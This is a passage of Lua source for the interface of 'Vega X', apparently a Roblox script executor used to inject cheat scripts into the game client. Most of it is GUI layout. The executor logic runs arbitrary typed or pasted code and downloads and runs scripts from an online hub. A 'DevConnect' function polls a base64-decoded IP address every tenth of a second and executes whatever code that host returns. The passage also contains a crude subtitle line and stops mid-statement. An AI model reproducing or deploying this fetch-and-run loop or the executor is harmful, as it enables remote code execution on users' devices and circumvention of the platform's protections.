Color3.fromRGB(58, 17, 17) R17.BackgroundTransparency = 1.000 R17.BorderColor3 = Color3.fromRGB(0, 0, 0) R17.BorderSizePixel = 0 R17.Position = UDim2.new(0.800000012, 0, 0, 0) R17.Size = UDim2.new(0.075000003, 0, 0, 0) R17.ZIndex = 17 R18.Name = "R18" R18.Parent = BackgroundFrame R18.BackgroundColor3 = Color3.fromRGB(39, 11, 11) R18.BackgroundTransparency = 1.000 R18.BorderColor3 = Color3.fromRGB(0, 0, 0) R18.BorderSizePixel = 0 R18.Position = UDim2.new(0.850000024, 0, 0, 0) R18.Size = UDim2.new(0.075000003, 0, 0, 0) R18.ZIndex = 18 R19.Name = "R19" R19.Parent = BackgroundFrame R19.BackgroundColor3 = Color3.fromRGB(19, 6, 6) R19.BackgroundTransparency = 1.000 R19.BorderColor3 = Color3.fromRGB(0, 0, 0) R19.BorderSizePixel = 0 R19.Position = UDim2.new(0.899999976, 0, 0, 0) R19.Size = UDim2.new(0.075000003, 0, 0, 0) R19.ZIndex = 19 R20.Name = "R20" R20.Parent = BackgroundFrame R20.BackgroundColor3 = Color3.fromRGB(0, 0, 0) R20.BackgroundTransparency = 1.000 R20.BorderColor3 = Color3.fromRGB(0, 0, 0) R20.BorderSizePixel = 0 R20.Position = UDim2.new(0.949999988, 0, 0, 0) R20.Size = UDim2.new(0.075000003, 0, 0, 0) R20.ZIndex = 20 VegaXLogo_4.Name = "VegaXLogo" VegaXLogo_4.Parent = IntroFrame VegaXLogo_4.AnchorPoint = Vector2.new(0.5, 0.5) VegaXLogo_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) VegaXLogo_4.BackgroundTransparency = 1.000 VegaXLogo_4.BorderSizePixel = 0 VegaXLogo_4.Position = UDim2.new(0.5, 0, 0.699999988, 0) VegaXLogo_4.Size = UDim2.new(0, 100, 0, 100) VegaXLogo_4.ZIndex = 21 VegaXLogo_4.Image = "http://www.roblox.com/asset/?id=15861930865" VegaXLogo_4.ImageTransparency = 1.000 ScriptListWindow.Name = "ScriptListWindow" ScriptListWindow.Parent = VegaXAndroidUI ScriptListWindow.AnchorPoint = Vector2.new(0, 0.5) ScriptListWindow.BackgroundColor3 = Color3.fromRGB(20, 20, 20) ScriptListWindow.BorderColor3 = Color3.fromRGB(30, 30, 30) ScriptListWindow.BorderSizePixel = 0 ScriptListWindow.Position = UDim2.new(0, 200, 0.5, -20) ScriptListWindow.Size = UDim2.new(1, -200, 1, 40) ScriptListWindow.Visible = false WindowMainTitle_4.Name = "WindowMainTitle" WindowMainTitle_4.Parent = ScriptListWindow WindowMainTitle_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) WindowMainTitle_4.BackgroundTransparency = 1.000 WindowMainTitle_4.BorderSizePixel = 0 WindowMainTitle_4.Position = UDim2.new(0, 7, 0, 52) WindowMainTitle_4.Size = UDim2.new(0, 309, 0, 21) WindowMainTitle_4.Font = Enum.Font.GothamBold WindowMainTitle_4.Text = "Script List" WindowMainTitle_4.TextColor3 = Color3.fromRGB(255, 255, 255) WindowMainTitle_4.TextSize = 18.000 WindowMainTitle_4.TextXAlignment = Enum.TextXAlignment.Left WindowMainTitle_4.TextYAlignment = Enum.TextYAlignment.Top CloseB_5.Name = "CloseB" CloseB_5.Parent = ScriptListWindow CloseB_5.AnchorPoint = Vector2.new(1, 0) CloseB_5.BackgroundTransparency = 1.000 CloseB_5.BorderSizePixel = 0 CloseB_5.LayoutOrder = 6 CloseB_5.Position = UDim2.new(1, -5, 0, 45) CloseB_5.Size = UDim2.new(0, 25, 0, 25) CloseB_5.ZIndex = 2 CloseB_5.Image = "rbxassetid://3926307971" CloseB_5.ImageRectOffset = Vector2.new(884, 284) CloseB_5.ImageRectSize = Vector2.new(36, 36) ScriptListFrame.Name = "ScriptListFrame" ScriptListFrame.Parent = ScriptListWindow ScriptListFrame.Active = true ScriptListFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ScriptListFrame.BackgroundTransparency = 1.000 ScriptListFrame.BorderSizePixel = 0 ScriptListFrame.Position = UDim2.new(0, 0, 0, 91) ScriptListFrame.Size = UDim2.new(1, 0, 1, -91) ScriptListFrame.CanvasSize = UDim2.new(0, 0, 1, 0) ScriptListFrame.ScrollBarThickness = 0 S1_3.Name = "S1" S1_3.Parent = ScriptListFrame S1_3.BackgroundColor3 = Color3.fromRGB(38, 38, 38) S1_3.BorderSizePixel = 0 S1_3.Size = UDim2.new(1, -10, 0, 60) Trash.Name = "Trash" Trash.Parent = S1_3 Trash.AnchorPoint = Vector2.new(1, 0.5) Trash.BackgroundColor3 = Color3.fromRGB(67, 67, 67) Trash.BackgroundTransparency = 0.400 Trash.BorderSizePixel = 0 Trash.LayoutOrder = 10 Trash.Position = UDim2.new(1, -23, 0.5, 0) Trash.Size = UDim2.new(0, 34, 0, 34) Trash.ZIndex = 2 Trash.Image = "rbxassetid://3926305904" Trash.ImageRectOffset = Vector2.new(644, 724) Trash.ImageRectSize = Vector2.new(36, 36) UICorner_45.CornerRadius = UDim.new(0, 10) UICorner_45.Parent = Trash UICorner_46.CornerRadius = UDim.new(0, 10) UICorner_46.Parent = S1_3 Title_11.Name = "Title" Title_11.Parent = S1_3 Title_11.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title_11.BackgroundTransparency = 1.000 Title_11.BorderSizePixel = 0 Title_11.Position = UDim2.new(0, 25, 0, 0) Title_11.Size = UDim2.new(1, -93, 1, 0) Title_11.Font = Enum.Font.GothamBold Title_11.Text = "somethingnice.txt" Title_11.TextColor3 = Color3.fromRGB(255, 255, 255) Title_11.TextSize = 19.000 Title_11.TextXAlignment = Enum.TextXAlignment.Left Execute_2.Name = "Execute" Execute_2.Parent = S1_3 Execute_2.AnchorPoint = Vector2.new(1, 0.5) Execute_2.BackgroundColor3 = Color3.fromRGB(67, 67, 67) Execute_2.BackgroundTransparency = 0.400 Execute_2.BorderSizePixel = 0 Execute_2.LayoutOrder = 10 Execute_2.Position = UDim2.new(1, -62, 0.5, 0) Execute_2.Size = UDim2.new(0, 34, 0, 34) Execute_2.ZIndex = 2 Execute_2.Image = "rbxassetid://3926307971" Execute_2.ImageRectOffset = Vector2.new(764, 244) Execute_2.ImageRectSize = Vector2.new(36, 36) UICorner_47.CornerRadius = UDim.new(0, 10) UICorner_47.Parent = Execute_2 UIListLayout_4.Parent = ScriptListFrame UIListLayout_4.HorizontalAlignment = Enum.HorizontalAlignment.Center UIListLayout_4.SortOrder = Enum.SortOrder.LayoutOrder UIListLayout_4.Padding = UDim.new(0, 5) WindowSubTitle_2.Name = "WindowSubTitle" WindowSubTitle_2.Parent = ScriptListWindow WindowSubTitle_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) WindowSubTitle_2.BackgroundTransparency = 1.000 WindowSubTitle_2.BorderSizePixel = 0 WindowSubTitle_2.Position = UDim2.new(0, 7, 0, 72) WindowSubTitle_2.Size = UDim2.new(0, 309, 0, 14) WindowSubTitle_2.Font = Enum.Font.Gotham WindowSubTitle_2.Text = "I cum making this. - Rudy" WindowSubTitle_2.TextColor3 = Color3.fromRGB(255, 255, 255) WindowSubTitle_2.TextSize = 12.000 WindowSubTitle_2.TextXAlignment = Enum.TextXAlignment.Left WindowSubTitle_2.TextYAlignment = Enum.TextYAlignment.Top -- Scripts: local function UENDBFZ_fake_script() -- VegaXAndroidUI.EverythingElse local script = Instance.new('LocalScript', VegaXAndroidUI) --local WriteToMocorFolder = clonefunction(arceus.writearceusfile) -- Dev Connect getgenv().DevConnect = function(devcode) warn("(Panda-Pelican Development | HTTP Protocol [ Beta ])") local No_Execute = "No_Data_Set_Here" local IPv4 = base64.decode(devcode) if IPv4 == "" or IPv4 == nil then warn("[Unable to Start HTTP-Protocol] - Missing IP Address / Port") return end task.spawn(function() script.Parent.ExecutorWindow.DevModeB.BackgroundColor3 = Color3.fromRGB(57, 195, 57) while true do wait(0.1) local content = game:HttpGet("http://"..IPv4..":2023".."/readcontent") if content ~= No_Execute then local success, result = pcall(function() runcode(content) local a = tostring(game:HttpGet("http://"..IPv4..":2023".."/clear")) end) if not success then -- Handle the exception here warn("Error executing loaded code:", result) local b = tostring(game:HttpGet("http://"..IPv4..":2023".."/clear")) end end end end) end -- Dragging Menu local UserInputService = game:GetService("UserInputService") local gui = script.Parent.VegaXMenuToggleFrame local dragging local dragInput local dragStart local startPos local function update(input) local delta = input.Position - dragStart gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end gui.DragTouch.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = gui.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) gui.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) UserInputService.InputChanged:Connect(function(input) if input == dragInput and dragging then update(input) end end) local TweenService = game:GetService("TweenService") local ExecutorWindowOpen = false local ScriptHubWindowOpen = false local SettingsWindowOpen = false _G.MenuOpen = true script.Parent.VegaXMenuToggleFrame.VegaXMenuToggle.MouseButton1Click:connect(function() if _G.MenuOpen == false then _G.MenuOpen = true script.Parent.SidebarFrame:TweenPosition(UDim2.new(0,0,0.5,0), "Out", "Quint", 1, true) if ExecutorWindowOpen == true then script.Parent.ExecutorWindow:TweenPosition(UDim2.new(0,200,0.5,-20), "Out", "Quint", 1, true) end if ScriptHubWindowOpen == true then script.Parent.ScriptHubWindow:TweenPosition(UDim2.new(0,200,0.5,-20), "Out", "Quint", 1, true) end if SettingsWindowOpen == true then script.Parent.SettingsWindow:TweenPosition(UDim2.new(0,200,0.5,-20), "Out", "Quint", 1, true) end else _G.MenuOpen = false script.Parent.SidebarFrame:TweenPosition(UDim2.new(0,-200,0.5,0), "Out", "Quint", 1, true) script.Parent.ExecutorWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) script.Parent.ScriptHubWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) script.Parent.SettingsWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) end end) -- Menu Switching script.Parent.SidebarFrame.ScrollingFrame.Choice1.C1EB.MouseButton1Click:connect(function() if ExecutorWindowOpen == false then ExecutorWindowOpen = true script.Parent.ExecutorWindow:TweenPosition(UDim2.new(0,200,0.5,-20), "Out", "Quint", 1, true) ScriptHubWindowOpen = false script.Parent.ScriptHubWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) SettingsWindowOpen = false script.Parent.SettingsWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) else ExecutorWindowOpen = false script.Parent.ExecutorWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) end end) script.Parent.SidebarFrame.ScrollingFrame.Choice2.C2EB.MouseButton1Click:connect(function() if ScriptHubWindowOpen == false then ScriptHubWindowOpen = true script.Parent.ScriptHubWindow:TweenPosition(UDim2.new(0,200,0.5,-20), "Out", "Quint", 1, true) ExecutorWindowOpen = false script.Parent.ExecutorWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) SettingsWindowOpen = false script.Parent.SettingsWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) else ScriptHubWindowOpen = false script.Parent.ScriptHubWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) end end) script.Parent.SidebarFrame.ScrollingFrame.Choice3.C3EB.MouseButton1Click:connect(function() if SettingsWindowOpen == false then SettingsWindowOpen = true script.Parent.SettingsWindow:TweenPosition(UDim2.new(0,200,0.5,-20), "Out", "Quint", 1, true) ExecutorWindowOpen = false script.Parent.ExecutorWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) ScriptHubWindowOpen = false script.Parent.ScriptHubWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) else SettingsWindowOpen = false script.Parent.SettingsWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) end end) -- Executor Window script.Parent.ExecutorWindow.CloseB.MouseButton1Click:connect(function() ExecutorWindowOpen = false script.Parent.ExecutorWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) end) script.Parent.ExecutorWindow.ExecuteB.MouseButton1Click:connect(function() --print(script.Parent.ExecutorWindow.ScrollingBox.TextBox.Text) executecode(script.Parent.ExecutorWindow.ScrollingBox.TextBox.Text) end) script.Parent.ExecutorWindow.PasteandExecuteB.MouseButton1Click:connect(function() executeclipboard() end) script.Parent.ExecutorWindow.DevModeB.MouseButton1Click:connect(function() if isfile("injectcode.txt") == false then script.Parent.ExecutorWindow.ScrollingBox.TextBox.Text = "The inject code for Dev Mode is not found, please open the Vega X Windows Client, get your inject code, and paste it in settings." else DevConnect(readfile("injectcode.txt")) end end) -- Executor Window Tabbing System local scriptamt = 1 local listamt = 1 local scripts = {""} local scriptsname = {"Script 1"} script.Parent.ExecutorWindow.TabbingSystem.LastPage.MouseButton1Click:connect(function() if scriptamt > 1 then scripts[scriptamt] = script.Parent.ExecutorWindow.ScrollingBox.TextBox.Text scriptamt = scriptamt - 1 script.Parent.ExecutorWindow.ScrollingBox.TextBox.Text = scripts[scriptamt] script.Parent.ExecutorWindow.TabbingSystem.ScriptPage.Text = scriptsname[scriptamt] end end) script.Parent.ExecutorWindow.TabbingSystem.NextPage.MouseButton1Click:connect(function() -- Save Current Script Tab scripts[scriptamt] = script.Parent.ExecutorWindow.ScrollingBox.TextBox.Text scriptamt = scriptamt + 1 if scriptamt ~= listamt then table.insert(scripts, "") table.insert(scriptsname, "Script "..scriptamt) listamt = listamt + 1 end script.Parent.ExecutorWindow.ScrollingBox.TextBox.Text = scripts[scriptamt] script.Parent.ExecutorWindow.TabbingSystem.ScriptPage.Text = scriptsname[scriptamt] end) script.Parent.ExecutorWindow.TabbingSystem.EditTabName.MouseButton1Click:connect(function() script.Parent.ExecutorWindow.TabbingSystem.ScriptPage.Visible = false script.Parent.ExecutorWindow.TabbingSystem.EditTabBox.Visible = true end) script.Parent.ExecutorWindow.TabbingSystem.EditTabBox.FocusLost:connect(function() scriptsname[scriptamt] = script.Parent.ExecutorWindow.TabbingSystem.EditTabBox.Text script.Parent.ExecutorWindow.TabbingSystem.ScriptPage.Text = scriptsname[scriptamt] script.Parent.ExecutorWindow.TabbingSystem.ScriptPage.Visible = true script.Parent.ExecutorWindow.TabbingSystem.EditTabBox.Visible = false script.Parent.ExecutorWindow.TabbingSystem.EditTabBox.Text = "" end) script.Parent.ExecutorWindow.ClearB.MouseButton1Click:connect(function() script.Parent.ExecutorWindow.ScrollingBox.TextBox.Text = "" end) -- Script Hub Window script.Parent.ScriptHubWindow.CloseB.MouseButton1Click:connect(function() ScriptHubWindowOpen = false script.Parent.ScriptHubWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) end) -- Settings Window script.Parent.SettingsWindow.CloseB.MouseButton1Click:connect(function() SettingsWindowOpen = false script.Parent.SettingsWindow:TweenPosition(UDim2.new(1,200,0.5,-20), "Out", "Quint", 1, true) end) -- Scrolling Frame Canvas Adjuster -- Credits: https://devforum.roblox.com/t/have-uilistlayout-set-the-canvassize-property-of-scrollingframes-automatically/76287 script.Parent.ScriptHubWindow.ScrollingFrame.UIListLayout:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(function() script.Parent.ScriptHubWindow.ScrollingFrame.CanvasSize = UDim2.new(0,0,0,script.Parent.ScriptHubWindow.ScrollingFrame.UIListLayout.AbsoluteContentSize.Y) end) script.Parent.ScriptListWindow.ScriptListFrame.UIListLayout:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(function() script.Parent.ScriptListWindow.ScriptListFrame.CanvasSize = UDim2.new(0,0,0,script.Parent.ScriptListWindow.ScriptListFrame.UIListLayout.AbsoluteContentSize.Y) end) script.Parent.SettingsWindow.ScrollingFrame.UIListLayout:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(function() script.Parent.SettingsWindow.ScrollingFrame.CanvasSize = UDim2.new(0,0,0,script.Parent.SettingsWindow.ScrollingFrame.UIListLayout.AbsoluteContentSize.Y) end) script.Parent.SidebarFrame.ScrollingFrame.UIListLayout:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(function() script.Parent.SidebarFrame.ScrollingFrame.CanvasSize = UDim2.new(0,0,0,script.Parent.SidebarFrame.ScrollingFrame.UIListLayout.AbsoluteContentSize.Y) end) -- Username Setting -- From: https://www.youtube.com/watch?v=e4nBaHjr5Hw -- dunno how to make one myself l0l local plrAvatar, isReady = game:GetService("Players"):GetUserThumbnailAsync(game:GetService("Players").LocalPlayer.UserId, Enum.ThumbnailType.AvatarBust, Enum.ThumbnailSize.Size48x48) script.Parent.SidebarFrame.ScrollingFrame.UsernamePlace.Title.Text = "Hello!\n"..game:GetService("Players").LocalPlayer.Name script.Parent.SidebarFrame.ScrollingFrame.UsernamePlace.Icon.ProfileImage.Image = plrAvatar end coroutine.wrap(UENDBFZ_fake_script)() local function KEARIL_fake_script() -- ScriptHubWindow.ScriptBloxCode local script = Instance.new('LocalScript', ScriptHubWindow) ChosenColor = "#1890ff" local page = 1 local searchstring = "a" if isfile("theme_vegax_color.txt") == true then ChosenColor = readfile("theme_vegax_color.txt") end local httpService = game:GetService("HttpService"); local content = {}; local scriptBlox = { host = "https://scriptblox.com" } --[[ function scriptBlox:loadImage(path, id) if not isfolder("ScriptBlox") then makefolder("ScriptBlox"); end local fileName = "ScriptBlox/" .. id .. ".webp"; local data = http_request({ Url = scriptBlox.host .. path, Method = "GET" }); if data.Success then writefile(fileName, data.Body); return getcustomasset(fileName); else return ""; end end function scriptBlox:loadImage(gameId) local thumbnailUrl = "https://www.roblox.com/asset-thumbnail/image?assetId=" .. tostring(gameId) .. "&width=420&height=420&format=png" local success, imageData = pcall(function() return http_request({ Url = thumbnailUrl, Method = "GET" }) end) if success and imageData.Success then local thumbnailId = game:GetService("ContentProvider"):PreloadAsync({ imageData.Body }) return thumbnailId else warn("Failed to load image for game ID:", gameId) return "" end end ]] --[[ function scriptBlox:GET(path) local result = http_request({ Url = scriptBlox.host .. path, Method = "GET" }) if result.Success then local status, data = pcall(function() return httpService:JSONDecode(result.Body) end) if status then return data.result.scripts else warn("Error decoding JSON:", data) return { result = { totalPages = 1, scripts = {} } } end else warn("HTTP request failed:", result.StatusCode, result.Body) return { result = { totalPages = 1, scripts = {} } } end end ]] function scriptBlox:GET(path) local result = http_request({ Url = scriptBlox.host .. path, Method = "GET" }) if result.Success then local status, data = pcall(function() return httpService:JSONDecode(result.Body) end) if status and data and data.result and data.result.scripts then return data.result.scripts else warn("Error decoding JSON:", data) end else warn("HTTP request failed:", result.StatusCode, result.Body) end -- Return a default value in case of error or missing data return { result = { totalPages = 1, scripts = {} } } end function scriptBlox:getScripts(searchQuery, page, maxResults) local path = "/api/script/search?q=" .. searchQuery .. "&mode=free&max=" .. tostring(maxResults) .. "&page=" .. tostring(page); local data = scriptBlox:GET(path); return data; end function Create_Script_Rectangle(title, subtitle, gamingid, scripttext) local S1 = Instance.new("Frame") local Execute = Instance.new("ImageButton") local UICorner = Instance.new("UICorner") local UICorner_2 = Instance.new("UICorner") local ImageLabel = Instance.new("ImageLabel") local UICorner_3 = Instance.new("UICorner") local SubTitle = Instance.new("TextLabel") local Title = Instance.new("TextLabel") --Properties: S1.Name = "S1" S1.Parent = ScrollingFrame_2 S1.BackgroundColor3 = Color3.fromRGB(38, 38, 38) S1.BorderSizePixel = 0 S1.Size = UDim2.new(1, -10, 0, 80) Execute.Name = "Execute" Execute.Parent = S1 Execute.AnchorPoint = Vector2.new(1, 0.5) Execute.BackgroundColor3 = Color3.fromRGB(67, 67, 67) Execute.BackgroundTransparency = 0.400 Execute.BorderSizePixel = 0 Execute.LayoutOrder = 10 Execute.Position = UDim2.new(1, -23, 0.5, 0) Execute.Size = UDim2.new(0, 34, 0, 34) Execute.ZIndex = 2 Execute.Image = "rbxassetid://3926307971" Execute.ImageRectOffset = Vector2.new(764, 244) Execute.ImageRectSize = Vector2.new(36, 36) Execute.MouseButton1Click:Connect(function() executecode(scripttext) end) UICorner.CornerRadius = UDim.new(0, 10) UICorner.Parent = Execute UICorner_2.CornerRadius = UDim.new(0, 10) UICorner_2.Parent = S1 ImageLabel.Parent = S1 ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel.BackgroundTransparency = 1.000 ImageLabel.BorderSizePixel = 0 ImageLabel.Size = UDim2.new(1, 0, 1, 0) ImageLabel.Image = "https://assetgame.roblox.com/Game/Tools/ThumbnailAsset.ashx?aid="..gamingid.."&fmt=png&wd=420&ht=420" ImageLabel.ScaleType = Enum.ScaleType.Crop UICorner_3.CornerRadius = UDim.new(0, 10) UICorner_3.Parent = ImageLabel SubTitle.Name = "SubTitle" SubTitle.Parent = S1 SubTitle.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SubTitle.BackgroundTransparency = 1.000 SubTitle.BorderSizePixel = 0 SubTitle.Position = UDim2.new(0, 25, 0.5, 0) SubTitle.Size = UDim2.new(1, -93, 0.5, 0) SubTitle.Font = Enum.Font.Gotham SubTitle.Text = subtitle SubTitle.TextColor3 = Color3.fromRGB(255, 255, 255) SubTitle.TextSize = 14.000 SubTitle.TextXAlignment = Enum.TextXAlignment.Left SubTitle.TextYAlignment = Enum.TextYAlignment.Top Title.Name = "Title" Title.Parent = S1 Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title.BackgroundTransparency = 1.000 Title.BorderSizePixel = 0 Title.Position = UDim2.new(0, 25, 0, 0) Title.Size = UDim2.new(1, -93, 0.5, 0) Title.Font = Enum.Font.GothamBold Title.Text = title Title.TextColor3 = Color3.fromRGB(255, 255, 255) Title.TextSize = 19.000 Title.TextXAlignment = Enum.TextXAlignment.Left Title.TextYAlignment = Enum.TextYAlignment.Bottom table.insert(content, S1); end function Clear() -- Clears the script list for _, element in pairs(content) do element:Destroy(); end content = {}; --delfolder("ScriptBlox"); -- clearing cache end --[[ function Handle_Results(results) if results.error then print("Error: "..results.error); --table.foreach(results.error, print) return end Clear(); for _, scriptData in pairs(results) do local gameData = scriptData.game; --local image = scriptBlox:loadImage(gameData.imageUrl, scriptData._id); Create_Script_Rectangle(scriptData.title, gameData.name, gameData.gameId, scriptData.script); end end ]] function Handle_Results(results) if results then Clear() for _, scriptData in pairs(results) do local gameData = scriptData.game Create_Script_Rectangle(scriptData.title, gameData.name, gameData.gameId, scriptData.script) end else error("Invalid JSON structure. Unable to process results.") end end function Search(query) -- Searches using a query and parses the result into a script list page = 1 script.Parent.PaginationFrame.PageLabel.Text = page if query == "" then searchstring = "a" else searchstring = httpService:UrlEncode(query) end local searchResults = scriptBlox:getScripts(searchstring, 1, 20); Handle_Results(searchResults); end -- Front page local frontPage = scriptBlox:getScripts("a", 1, 20); Handle_Results(frontPage); script.Parent.SearchBox.FocusLost:connect(function() script.Parent.PaginationFrame.PageLabel.Text = page Search(script.Parent.SearchBox.Text) end) script.Parent.PaginationFrame.LeftPage.MouseButton1Click:connect(function() if page ~= 1 then page -= 1 Handle_Results(scriptBlox:getScripts(searchstring, page, 20)); end script.Parent.PaginationFrame.PageLabel.Text = page end) script.Parent.PaginationFrame.RightPage.MouseButton1Click:connect(function() page += 1 Handle_Results(scriptBlox:getScripts(searchstring, page, 20)); script.Parent.PaginationFrame.PageLabel.Text = page end) end coroutine.wrap(KEARIL_fake_script)() local function WVKWVWW_fake_script() -- ScrollingBox.TextBoxCode local script = Instance.new('LocalScript', ScrollingBox) local TextBox = script.Parent.TextBox local LineWatcher = script.Parent.Line local FontSize = TextBox.TextSize local TopCount ----- local function resize(iter, subtract, maxsize) for i = 1,iter do maxsize.CanvasSize = UDim2.new(0,maxsize.CanvasSize.X.Offset,0,(iter * FontSize)) maxsize.CanvasPosition = Vector2.new(maxsize.CanvasPosition.X, (iter * FontSize)) end end ----- TextBox:GetPropertyChangedSignal("Text"):Connect(function() local str = TextBox.Text local offset = 32 local textsize = TextBox.TextBounds.X + offset script.Parent.CanvasSize = UDim2.new(0,textsize,0,script.Parent.CanvasSize.Y.Offset) script.Parent.CanvasPosition = Vector2.new(textsize, script.Parent.CanvasPosition.Y) local _,count = str:gsub('\n','\n') local NewCount = count + 1 if not LineWatcher.Text:find(NewCount) then TopCount = NewCount for i = 1,TopCount do local PreviousText = LineWatcher.Text if not LineWatcher.Text:find(i) then LineWatcher.Text = tostring(PreviousText..i..'\n') end end resize(TopCount,false,script.Parent) else if TopCount ~= NewCount and TopCount ~= nil then LineWatcher.Text = "" TopCount = NewCount for i = 1,TopCount do LineWatcher.Text = tostring(LineWatcher.Text..i..'\n') end resize(TopCount,true,script.Parent) end end end) end coroutine.wrap(WVKWVWW_fake_script)() local function VJJF_fake_script() -- VegaXAndroidUI.SettingsSystem local script = Instance.new('LocalScript', VegaXAndroidUI) ChosenColor = "#C33939" function LoadColors() script.Parent.SidebarFrame.Banner.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.SidebarFrame.ScrollingFrame.UsernamePlace.Icon.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.SidebarFrame.ScrollingFrame.Choice1.Icon.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.SidebarFrame.ScrollingFrame.Choice1.C1EB.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.SidebarFrame.ScrollingFrame.Choice2.Icon.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.SidebarFrame.ScrollingFrame.Choice2.C2EB.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.SidebarFrame.ScrollingFrame.Choice3.Icon.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.SidebarFrame.ScrollingFrame.Choice3.C3EB.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.KeySystem.Banner.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.KeySystem.GetKeyB.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.KeySystem.ApproveKeyB.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.ExecutorWindow.TabbingSystem.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.ExecutorWindow.ExecuteB.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.ExecutorWindow.PasteandExecuteB.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.ExecutorWindow.DevModeB.BackgroundColor3 = Color3.fromHex(ChosenColor) script.Parent.SettingsWindow.ScrollingFrame.S1.AccentColorPreview.BackgroundColor3 = Color3.fromHex(ChosenColor) end -- Set Color if not isfile("theme_vegax_color.txt") then writefile("theme_vegax_color.txt", "#C33939") else local success, ChosenColor = pcall(readfile, "theme_vegax_color.txt") if success then LoadColors() else warn("无法读取文件: " .. ChosenColor) end end --if not isfile("theme_vegax_color.txt") then --writefile("theme_vegax_color.txt", "#C33939") --else --ChosenColor = readfile("theme_vegax_color.txt") --script.Parent.IntroFrame.ImageColor3 = Color3.fromHex(ChosenColor) --LoadColors() --end -- Set FPS local success, result = pcall(function() if isfile("settings_fps.txt") == true then setfpscap(tonumber(readfile("settings_fps.txt"))) end end) if not success then -- Handle the error, you can print a message or take other appropriate actions print("无法读取文件:", result) end --if isfile("settings_fps.txt") == true then --setfpscap(tonumber(readfile("settings_fps.txt"))) --end -- Set Inject Code local success, result = pcall(function() if isfile("injectcode.txt") then script.Parent.SettingsWindow.ScrollingFrame.S3.InjectCodeTextbox.Text = readfile("injectcode.txt") end end) if not success then print("无法读取文件:", result) end --if isfile("injectcode.txt") == true then --script.Parent.SettingsWindow.ScrollingFrame.S3.InjectCodeTextbox.Text = readfile("injectcode.txt") --end script.Parent.SettingsWindow.ScrollingFrame.S1.SubmitAccent.MouseButton1Click:Connect(function() writefile("theme_vegax_color.txt", script.Parent.SettingsWindow.ScrollingFrame.S1.AccentTextBox.Text) ChosenColor = script.Parent.SettingsWindow.ScrollingFrame.S1.AccentTextBox.Text LoadColors() end) script.Parent.SettingsWindow.ScrollingFrame.S2.SubmitFPS.MouseButton1Click:Connect(function() writefile("settings_fps.txt", script.Parent.SettingsWindow.ScrollingFrame.S2.FPSTextBox.Text) setfpscap(tonumber(script.Parent.SettingsWindow.ScrollingFrame.S2.FPSTextBox.Text)) end) script.Parent.SettingsWindow.ScrollingFrame.S2.ResetFPS.MouseButton1Click:Connect(function() writefile("settings_fps.txt", "60") setfpscap(60) end) script.Parent.SettingsWindow.ScrollingFrame.S3.SubmitCode.MouseButton1Click:Connect(function() writefile("injectcode.txt", script.Parent.SettingsWindow.ScrollingFrame.S3.InjectCodeTextbox.Text) DevConnect(script.Parent.SettingsWindow.ScrollingFrame.S3.InjectCodeTextbox.Text) end) script.Parent.SettingsWindow.ScrollingFrame.S3.ResetCode.MouseButton1Click:Connect(function() script.Parent.SettingsWindow.ScrollingFrame.S3.InjectCodeTextbox.Text = "" delfile("injectcode.txt") end) script.Parent.SettingsWindow.ScrollingFrame.S4.ToggleBTN.MouseButton1Click:Connect(function() end) end coroutine.wrap(VJJF_fake_script)() local function KJDH_fake_script() -- VegaXAndroidUI.Loading local script = Instance.new('LocalScript', VegaXAndroidUI) ATime = 2 zidongjiaobenyunxinglujingzifuchuan = "自动脚本运行" -- Key System Pre-Requisities local PandaAuth = 